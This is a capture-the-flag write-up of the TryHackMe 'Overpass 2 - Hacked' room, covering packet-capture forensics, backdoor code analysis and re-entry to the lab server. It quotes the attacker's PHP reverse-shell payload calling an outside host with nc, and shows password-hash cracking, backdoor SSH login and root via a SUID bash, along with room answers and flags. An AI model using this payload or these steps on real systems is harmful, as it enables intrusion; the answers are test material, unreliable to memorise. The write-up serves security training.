TryHackMe - Overpass 2 - Hacked - Writeup
Overpass has been hacked! Can you analyse the attacker’s actions and hack back in?
Forensics - Analyse the PCAP
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass’ production server?
Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.
md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc
-
What was the URL of the page they used to upload a reverse shell?
Check overpass2.pcapng line number 27.
Answer: /development/
-
What payload did the attacker use to gain access?
Check overpass2.pcapng line number 14 POST request.
Answer: <?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1 nc 192.168.170.145 4242 >/tmp/f”)?> -
What password did the attacker use to privesc?
Check overpass2.pcapng line number 76.
Answer: whenevernoteartinstant
-
How did the attacker establish persistence?
Check overpass2.pcapng line number 120.
Answer:
https://github.com/NinjaJc01/ssh-backdoor -
Using the fasttrack wordlist, how many of the system passwords were crackable?
Line number 114 in overpass2.pcapng the attacker dumped shadow file try to crack using john
Answer: 4
root@ip-10-10-204-217:~# john --wordlist=/usr/share/wordlists/fasttrack.txt hash.txzt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12 (bee)
abcd123 (szymex)
1qaz2wsx (muirland)
secuirty3 (paradox)
4g 0:00:00:02 DONE (2021-05-23 18:14) 1.351g/s 75.00p/s 375.0c/s 375.0C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Research - Analyse the code
Now that you’ve found the code for the backdoor, it’s time to analyse it.
-
What’s the default hash for the backdoor?
Clone the SSH Backdoor in the main.go there is a hash variable
Answer: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
-
What’s the hardcoded salt for the backdoor?
Last line in main.go have a hash which is the salt of the backdoor.
Answer: 1c362db832f3f864c8c2fe05f2002a05
-
What was the hash that the attacker used? - go back to the PCAP for this!
Line number 3479 the attacker used a hash.
Answer: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
-
Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
Lets use hash to crack using hashcat and rockyou.txt wordlists. Remember to combine the hash like hash:salt
hashcat --force -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txtAnswer: november16
Attack - Get back in!
-
The attacker defaced the website. What message did they leave as a heading?
Visit to the MACHINE_IP
Answer: H4ck3d by CooctusClan
-
Using the information you’ve found previously, hack your way back in!
Answer: Not required
Nmap Scan
root@ip-10-10-50-126:~# nmap -sVC -A 10.10.53.38
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-24 08:02 BST
Nmap scan report for ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
| 256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_ 256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_ 2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
MAC Address: 02:3B:97:A6:85:71 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=5/24%OT=22%CT=1%CU=38047%PV=Y%DS=1%DC=D%G=Y%M=023B97%T
OS:M=60AB4FA8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.13 seconds
On line number 72 of overpass2.pcapng I found a username james. Lets try to login using ssh, I tried to login with previous cracked password but 22 port won’t let me in with the password november16 . Let’s try in 2222 port
root@ip-10-10-50-126:~# ssh james@10.10.53.38 -p 2222
The authenticity of host '[10.10.53.38]:2222 ([10.10.53.38]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.53.38]:2222' (RSA) to the list of known hosts.
james@10.10.53.38's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
james@overpass-production:/home/james/ssh-backdoor$
Login success via ssh got the user.txt
-
What’s the user flag?
Answer: thm{d119b4fa8c497ddb0525f7ad200e6567}
In the direcotry of current logged user have .suid_bash
james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 2020 .
drwxr-xr-x 7 root root 4096 Jul 21 2020 ..
lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 2020 .cache
drwx------ 3 james james 4096 Jul 21 2020 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 2020 .local
-rw------- 1 james james 51 Jul 21 2020 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 2020 www
We got root and readed the txt file
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}
-
What’s the root flag?
Answer: thm{d53b2684f169360bb9606c333873144d}
TryHackMe room link: Overpass 2 - Hacked
Thanks for reading.